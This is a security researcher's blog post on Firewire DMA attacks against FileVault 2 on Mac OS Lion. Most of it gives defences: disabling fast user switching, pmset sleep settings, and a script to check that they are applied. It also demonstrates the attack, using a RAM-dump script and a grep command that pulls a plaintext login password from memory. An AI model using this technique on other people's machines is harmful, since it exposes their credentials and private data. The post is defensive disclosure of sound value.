There is some question about the extent to which Lion and FileVault are vulnerable to Firewire DMA attacks. I performed some research (the full paper is available below) and can present the following results:
Retrieving plain text passwords from RAM on Mac OS Lion (10.7) can be done under most circumstances where the system is using the default configuration. But I want to point out that this definitely isn't a fatal flaw in FileVault 2's design and that it is quite easy to mitigate these attacks. Unfortunately, Lion is not "secure by default".
Here is a quick summary of what states are susceptible to the attack:
For a more in-depth discussion of why, please see the paper (at the bottom of this post).
Stopping the Attack
Protecting against the attack is pretty simple (assuming that FV2 is turned on), requiring three configuration settings to be modified (Fast User Switching, and a couple of sleep options). This will protect the system as long as it isn't running and unlocked (in which case it is insecure anyway), and as long as you haven't logged out and left the system running (I don't have any suggestions for that one). Here is how...
Fast User Switching
This feature can be disabled in System Preferences by selecting "Users & Groups", clicking on "Login Options", and unchecking the "Show fast user switching menu as" check box:

Changing Sleep Options:
These settings must be changed from the command line, as the root user, using the “pmset” command. There are two relevant options:
| Option | Value | Description |
|---|---|---|
| destroyfvkeyonstandby | 1 | Removes the full volume encryption key from RAM when the system is put into sleep mode; its effect depends on the value of hibernatemode. |
| hibernatemode | 25 | Forces the system to immediately write RAM to disk and remove power from memory upon sleep. |
For example:
```
sudo pmset -a destroyfvkeyonstandby 1 hibernatemode 25
```
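As an added check that is not part of the original post, the helper below audits whether both power profiles actually carry the two settings set by the command above (a common slip is using `-b` or `-c` instead of `-a`, which hardens only one profile). It parses the text of `pmset -g custom` and assumes the Lion-era layout of a profile header line ("Battery Power:", "AC Power:") followed by indented key/value lines.

```shell
# Added audit helper (not from the original post). It reads the output of
# "pmset -g custom" and reports every power profile where the two settings
# recommended above are missing or mis-set.
# Exit status 0 means every profile has both values; 1 otherwise.
audit_pmset_profiles() {
    printf '%s\n' "$1" | awk '
        # A line ending in ":" starts a new profile section (assumed format).
        /^[A-Za-z].*:$/ { profile = $0; sub(/:$/, "", profile); seen[profile] = 1; next }
        # Inside a section, remember each key/value pair for that profile.
        NF >= 2 && profile != "" { val[profile, $1] = $2 }
        END {
            bad = 0
            for (p in seen) {
                bad += check(p, "destroyfvkeyonstandby", "1")
                bad += check(p, "hibernatemode", "25")
            }
            exit (bad > 0)
        }
        # Print a finding and return 1 when a profile lacks the wanted value.
        function check(p, key, want,   got) {
            got = ((p, key) in val) ? val[p, key] : "unset"
            if (got == want) return 0
            printf "%s: %s is %s, expected %s\n", p, key, got, want
            return 1
        }'
}

# Constructed sample: Battery Power hardened, AC Power left at defaults,
# which is what happens when pmset is run with -b instead of -a.
SAMPLE='Battery Power:
 hibernatemode        25
 destroyfvkeyonstandby 1
AC Power:
 hibernatemode        3'

audit_pmset_profiles "$SAMPLE" || echo "sample: not fully hardened"
# On the Mac itself, run: audit_pmset_profiles "$(pmset -g custom)"
```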
Performing the Attack
libforensic1394
I used Freddie Witherden's libforensic1394 libraries to connect over Firewire and dump the RAM into a binary file. I couldn't find a script that used the libraries to perform the dump, so I wrote a small Python script that uses the library. It is also capable (tested and confirmed) of performing DMA imaging of Windows 7 and Linux 2.6 systems with Firewire. The script is available here (ramdump.py).
Getting the libraries built is pretty simple. I tested on an Ubuntu 11.04 system, and a few libraries and programs that are needed weren't installed by default:
```
sudo apt-get install gcc g++ cmake linux-headers-generic
```
The build directions that Freddie Witherden provides are straightforward. Once built, you can perform a capture and grab passwords:
```
tag@ubuntu11:~$ sudo -s
[sudo] password for tag:
root@ubuntu11:~# ./ramdump.py 1024 f
SBP-2 not used, forcing 2048 byte pages.
[<forensic1394.device.Device object at 0x1078250>]
Attempting to access device 0: Apple Computer, Inc. Macintosh
Wrote file ramdump.bin.
root@ubuntu11:~# strings ramdump.bin |grep --after-context=3 managedUser \
> |grep --after-context=1 password
password
password1
shell
--
password
shell
root@ubuntu11:~#
```
The password (the line reading "password1" in the grep output above) was highlighted in red in the original post.
More Details
If you want more information please read the paper. The full text of the paper is available under a Creative Commons license.
Local Copy in PDF Format (272K) | Read online as a Google Doc
There is also a short PowerPoint available that provides a high-level overview.
Local Copy in PPTX Format (266K) | Read online as a Google Doc (didn’t format well, sorry.)
2 Responses to “Firewire Attacks Against Mac OS Lion FileVault 2 Encryption”

Question: What about other data in memory? If someone has a Word doc or a website open with sensitive information, could this also be read from RAM via Firewire? Will disabling fast user switching and running the pmset command also protect other data in memory, or just the FVK/password?
Yes, everything in RAM is accessible, including open (and probably recently-opened) documents. Ensuring that the Firewire port ACLs are in place will block all access to all memory using Firewire.